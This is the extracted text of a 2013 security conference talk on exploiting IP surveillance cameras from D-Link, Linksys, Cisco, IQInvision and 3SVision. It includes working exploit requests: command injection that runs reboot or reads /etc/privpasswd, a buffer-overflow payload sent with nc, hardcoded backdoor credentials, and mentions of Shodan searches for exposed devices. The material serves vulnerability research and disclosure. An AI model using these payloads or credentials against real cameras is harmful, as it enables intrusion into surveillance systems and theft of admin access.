Exploiting Surveillance Cameras Like a Hollywood Hacker Craig Heffner, Tactical Network Solutions Friday, July 12, 2013
Introduction ✤ Embedded vulnerability analyst for Tactical Network Solutions ✤ Embedded Device Exploitation course instructor ✤ I do wireless stuff from time to time too Friday, July 12, 2013
Objectives ✤ Analyze surveillance camera security ✤ Drop some 0-days ✤ Demo a true Hollywood-style hack Friday, July 12, 2013
D-Link DCS-7410 Friday, July 12, 2013
Lighttpd Access Rules Friday, July 12, 2013
What Isn’t in the Access Rules? Friday, July 12, 2013
rtpd.cgi Friday, July 12, 2013
eval($QUERY_STRING) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? action=stop ✤ Friday, July 12, 2013
Friday, July 12, 2013
The Exploit (No, Seriously...) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? reboot Friday, July 12, 2013
Grabing Admin Creds ✤ /cgi-bin/rtpd.cgi? echo&AdminPasswd_ss|tdb&get&HTTPAccount ✤ Friday, July 12, 2013
pwned. Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Shodan Dork Friday, July 12, 2013
CVE-2013-1599 ✤ Disclosed by Core Security after talk submission Friday, July 12, 2013
WVC80N Friday, July 12, 2013
/img/snapshot.cgi Friday, July 12, 2013
/adm/ez.cgi Friday, July 12, 2013
strcpy(dest, QUERY_STRING) Friday, July 12, 2013
Friday, July 12, 2013
/img/snapshot.cgi?A*152 Friday, July 12, 2013
Where to Return? Friday, July 12, 2013
Return to sub_9B88 ✤ PAYLOAD=$(perl -e 'print "A"x148; print " \x88\x9B "') ✤ echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n" | nc 192.168.1.100 80 Friday, July 12, 2013
When Base64 Isn’t Base64 Friday, July 12, 2013
BEST. USER GUIDE. EVER. Friday, July 12, 2013
Decoded Config Friday, July 12, 2013
pwned. Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Shodan Dorks Friday, July 12, 2013
Cisco PVC-2300 Friday, July 12, 2013
.htpasswd Protection Friday, July 12, 2013
/usr/local/www/oamp Friday, July 12, 2013
cgi_get_value(var_18, “action”) Friday, July 12, 2013
Valid Actions ✤ downloadConfigurationFile ✤ uploadConfigurationFile ✤ updateFirmware ✤ loadFirmware ✤ ... Friday, July 12, 2013
getenv(“SESSIONID”) Friday, July 12, 2013
strcasecmp(“login”, action) Friday, July 12, 2013
cgi_get_value(var_10, “user”) Friday, July 12, 2013
cgi_get_value(var_10, “password”) Friday, July 12, 2013
PRO_GetStr(“OAMP”, “l1_usr”, ...) Friday, July 12, 2013
PRO_GetStr(“OAMP”, “l1_pwd”, ...) Friday, July 12, 2013
strcmp(user, l1_usr) Friday, July 12, 2013
strcmp(password, l1_pwd) Friday, July 12, 2013
Where are l1_usr and l1_pwd? Friday, July 12, 2013
Friday, July 12, 2013
Getting a Session ID ✤ $ wget http://192.168.1.101/oamp/System.xml? action=login&user=L1_admin&password=L1_51 ✤ Friday, July 12, 2013
downloadConfigurationFile ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=downloadConfigurationFile Friday, July 12, 2013
When Base64 Isn’t Base64 Friday, July 12, 2013
Non-Standard Key String Friday, July 12, 2013
Decoded Config Friday, July 12, 2013
pwned. Friday, July 12, 2013
action=loadFirmware Friday, July 12, 2013
Friday, July 12, 2013
pwned x2 ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=loadFirmware&url=https://127.0.0.1:65534/ ;reboot; Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Shodan Dork Friday, July 12, 2013
IQInvision IQ832N Friday, July 12, 2013
Default Unauth Video Feed Friday, July 12, 2013
Admin Area Password Protected Friday, July 12, 2013
oidtable.cgi Friday, July 12, 2013
strstr(QUERY_STRING, “grep=”) Friday, July 12, 2013
if(strlen(grep) < 32) Friday, July 12, 2013
sprintf(“grep -i ‘%s’...”) Friday, July 12, 2013
popen(“grep -i ‘%s’...”) Friday, July 12, 2013
Friday, July 12, 2013
Command Injection ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/tmp/a;ps;' ✤ grep -i ‘’ /tmp/a;ps;’’ /tmp/oidtable.html Friday, July 12, 2013
Retrieving Arbitrary Files ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/etc/privpasswd;' ✤ grep -i ‘’ /etc/privpasswd;’’ /tmp/oidtable.html Friday, July 12, 2013
Encrypted Admin Password Friday, July 12, 2013
Decrypted Admin Password Friday, July 12, 2013
pwned. Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Shodan Dork ✤ jht Friday, July 12, 2013
3SVision N5071 Friday, July 12, 2013
Restricted Firmware Download Friday, July 12, 2013
Friday, July 12, 2013
Use the Source, Luke Friday, July 12, 2013
Literacy FTW Friday, July 12, 2013
/home/3s/bin Friday, July 12, 2013
pwdgrp_get_userinfo Friday, July 12, 2013
Friday, July 12, 2013
Hardest. Exploit. Ever. Friday, July 12, 2013
pwned. Friday, July 12, 2013
pwned. Friday, July 12, 2013
pwned. Friday, July 12, 2013
do_records Friday, July 12, 2013
records.cgi?action=remove Friday, July 12, 2013
strstr(cgi_parameters, “&filename”) Friday, July 12, 2013
system(“rm /mnt/sd/media/%s”) Friday, July 12, 2013
pwned x2 ✤ $ wget \ --user=3sadmin --password=27988303 \ 'http://192.168.1.101/records.cgi?\ action=remove&storage=sd&filename= `reboot` ' Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Also Affected Friday, July 12, 2013
Shodan Dorks Friday, July 12, 2013
Recommend
More recommend
